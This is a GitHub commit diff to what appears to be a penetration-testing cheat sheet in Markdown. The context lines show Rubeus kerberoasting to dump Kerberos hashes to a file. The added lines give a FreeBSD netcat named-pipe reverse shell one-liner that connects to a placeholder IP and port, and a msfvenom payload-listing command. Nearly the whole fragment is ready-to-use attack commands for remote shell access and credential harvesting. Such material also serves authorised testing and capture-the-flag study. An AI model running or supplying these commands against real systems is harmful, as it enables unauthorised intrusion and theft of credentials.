Update Cheat Sheet.md

This commit is contained in:
ARZ 2021-04-07 22:24:18 +05:00 committed by GitHub
parent d8a53dd779
commit c8ba36bd19
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -304,6 +304,16 @@ If the system has `PsExec.exe` open elevated cmd
* Documentation `https://github.com/GhostPack/Rubeus`
* Transfer rubeus.exe on targeted windows machine and run `.\Rubeus.exe kerberoast /outfile:C:\temp\hash.txt` to get a hash
# FreeBSD
### Enumeration
* The path for binaries is `/usr/local/bin`
### Reverse Shell
`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i |nc <ip> <port> > /tmp/f`
# Msfvenom
### List All Payloads
msfvenom -l payloads